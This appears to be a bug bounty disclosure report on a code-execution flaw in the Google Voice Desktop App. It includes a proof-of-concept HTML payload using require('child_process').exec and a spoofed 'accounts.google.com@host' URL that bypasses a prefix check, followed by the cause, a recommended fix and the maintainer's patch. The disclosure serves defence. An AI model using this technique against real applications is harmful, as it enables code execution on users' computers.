Valid

Reported on

Sep 12th 2021


✍️ Description

Attackers can execute malicious code on users' computers using the Google Voice Desktop App, provided that users click on a malicious hyperlink in the app itself.

🕵️‍♂️ Proof of Concept

  1. Host the following index.html on a web server:

     <script>
     require('child_process').exec('calc');
     </script>

  2. Users who click on the hyperlink https://accounts.google.com@[WEB_SERVER]/index.html in the Desktop App (via someone messaging them the link) will execute require('child_process').exec('calc'), which will open the calculator app on the computer.

💥 Impact

This vulnerability is capable of code execution via visiting a malicious hyperlink in the application.

Recommended Fix

The vulnerability exists because nodeIntegration is set to true, so whatever is embedded in a <script> tag on a webpage gets executed in Node. In addition, https://github.com/jerrod-lankford/google-voice-desktop-app/blob/master/src/main.js#L153L155 only checks whether the URL starts with https://accounts.google.com; however, the example URL https://accounts.google.com@webserver.local actually resolves to webserver.local, yet it passes that check. The recommended fix is to use Node.js url.parse and check whether host == "accounts.google.com" or "voice.google.com"; a better fix (if possible) would be to disable nodeIntegration entirely.

📍 Location main.js#L147-L149

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 years ago
haxatron (Researcher), 2 years ago:

@admin maintainer email is jllanko@ncsu.edu

I think the bot couldn't detect the email format listed in the SECURITY.md.

Z-Old (Admin), 2 years ago:


Hey haxatron, thanks for the heads up. I've emailed the maintainer for you.

We have contacted a member of the jerrod-lankford/google-voice-desktop-app team and are waiting to hear back 2 years ago
Jerrod Lankford (Maintainer), 2 years ago:


Sorry, I messed up my email in the security.md. It's fixed. I also took care of the vulnerability by parsing the URL as suggested. Unfortunately I can't remove node integration. Thanks for letting me know.

haxatron (Researcher), 2 years ago:


Hi there, thanks for fixing the vulnerability! Could you validate this report?

Jerrod Lankford validated this vulnerability 2 years ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jerrod Lankford marked this as fixed with commit 4d9fcf 2 years ago
Jerrod Lankford has been awarded the fix bounty
This vulnerability will not receive a CVE